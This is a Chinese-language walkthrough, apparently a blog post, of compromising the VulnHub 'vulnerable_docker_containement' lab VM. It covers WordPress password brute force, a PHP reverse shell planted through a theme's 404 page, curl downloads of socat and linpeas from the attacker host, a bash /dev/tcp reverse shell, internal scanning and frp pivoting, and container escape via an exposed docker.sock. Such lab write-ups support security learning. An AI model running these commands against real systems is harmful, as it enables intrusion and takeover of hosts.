vulnerable_docker_containement 靶机

vulnerable_docker_containement靶机

PDF:Target-practice/A_靶机复现 at main · szjr123/Target-practice

靶机描述没什么用,大意就是介绍这是个靶机。

靶机下载链接:

https://download.vulnhub.com/vulnerabledocker/vulnerable_docker_containement.ova

有困难和简单两个模式

信息搜集

会直接给出IP:10.10.10.150

端口扫描:

复制代码
nmap -p- --min-rate 1000  10.10.10.150

给出22和8000端口:

复制代码
nmap -p22,8000 -Sc -A -Pn --min-rate 1000 10.10.10.150

经典wordpress

访问看看

GetShell

docker环境

/robots.txt

wordpress版本都不是很高

/wp-admin/admin-ajax.php有个CVE-2022-21661

试了一下发现不能用

端口扫描的时候出来了bob,后台挂一下爆破

复制代码
python2 wpforce.py -i ../dict/user.txt -w ../dict/pass.txt -u "http://10.10.10.150:8000/wp-login.php"

登录进入后台

找到flag1

低版本直接上传shell就行

1、插件上传打包好的shell.zip

2、主题上传shell.php

3、修改主题404.php代码,访问特定的不存在 url(这个一般最简单)

4、修改header.php,执行恶意代码

kali自带:/usr/share/webshells/php/php-reverse-shell.php

复制代码
cp /usr/share/webshells/php/php-reverse-shell.php ./

ls

vim php-reverse-shell.php

修改脚本

访问一个不知道的页面

反弹成功

没有python,不能用pty形成交互页面

可以升级nc、socat、script

攻击机:

首先下载(不要直接下/bin的,过去依赖没有)

复制代码
​
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

python -m http.server 9999

​

执行

复制代码
socat file:`tty`,raw,echo=0 tcp-listen:4444

靶机:

复制代码
​
curl -O http://10.10.10.148:4444/socat

chmod +x socat

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.148:4444

​

docker逃逸

验证一下docker环境:

复制代码
cat /proc/1/cgroup | grep -qi docker && echo "Is Docker" || echo "Not Docker"

传个linpeas.sh上去

复制代码
curl http://10.10.10.148:9999/linpeas.sh -o linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

Linux version 3.13.0-128-generic (buildd@lgw01-39) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017

ip add

Ping命令查看存活主机

复制代码
for i in {1..254}; do (ping -c 1 172.18.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

端口探测

脚本:

复制代码
------

#!/bin/bash

hosts=(



"172.18.0.1"

"172.18.0.2"

"172.18.0.3"

"172.18.0.4"

)

END=65535

for host in "${hosts[@]}"

do

echo "==============================="

echo "Scanning $host"

echo "==============================="



for ((port=1;port<=END;port++))

do

echo "" > /dev/tcp/$host/$port && echo "Port $port is open"

done 2>/dev/null

done

------

下载脚本

复制代码
curl http://10.10.10.148:9999/port.sh -o port.sh

chmod +x port.sh

./port.sh

代理访问,参考(使用frp配置内网访问(穿透)教程(超详细,简单)-CSDN博客):

复制代码
​
curl -O http://10.10.10.148:9999/frpc

curl -O http://10.10.10.148:9999/frpc.ini

​

frpc.ini

frps.ini

复制代码
chmod +x frpc

攻击机:

复制代码
./frps -c frps.ini

靶机:

看见success

修改文件

复制代码
sudo gedit /etc/proxychains4.conf
复制代码
proxychains nmap -sT -sV -Pn -n -p8022 172.18.0.2

再次反弹shell

复制代码
bash -i >& /dev/tcp/10.10.10.148/9988 0>&1

/run目录下存在docker.sock文件,remote API未授权访问

参考:Docker Remote api在安全中的应用杂谈 - SecPulse.COM | 安全脉搏

换源,没有vim,echo写入

复制代码
cat > /etc/apt/sources.list << 'EOF'

deb http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse

deb http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse

deb http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse

deb http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse

deb http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse

deb-src http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse

deb-src http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse

deb-src http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse

deb-src http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse

deb-src http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse

EOF

安装docker

复制代码
apt-get update

apt-get install docker.io

挂载宿主机的根目录到容器内

复制代码
docker run --rm -it -v /:/tmp/1/ wordpress /bin/bash

读取宿主机文件

复制代码
cd /tmp/1/

cat flag_3
相关推荐
学Linux的语莫2 分钟前
docker,docker-compose二进制包安装
docker
世岩清上27 分钟前
AI驱动的智能运维:从自动化到自主化的技术演进与架构革新
运维·人工智能·自动化
听*雨声1 小时前
03_软考_网络安全
安全·web安全
老蒋新思维1 小时前
创客匠人视角:智能体重构创始人 IP,知识变现从 “内容售卖” 到 “能力复制” 的革命
大数据·网络·人工智能·tcp/ip·创始人ip·创客匠人·知识变现
张童瑶1 小时前
Linux SSH隧道代理转发及多层转发
linux·运维·ssh
石小千1 小时前
Linux安装OpenProject
linux·运维
Lime-30902 小时前
制作Ubuntu 24.04-GPU服务器测试系统盘
linux·运维·ubuntu
代码or搬砖2 小时前
Nginx详讲
运维·nginx·dubbo
_oP_i2 小时前
Docker 整体架构
docker·容器·架构
杨浦老苏2 小时前
可视化服务构建器Dock-Dploy
docker·工具·群晖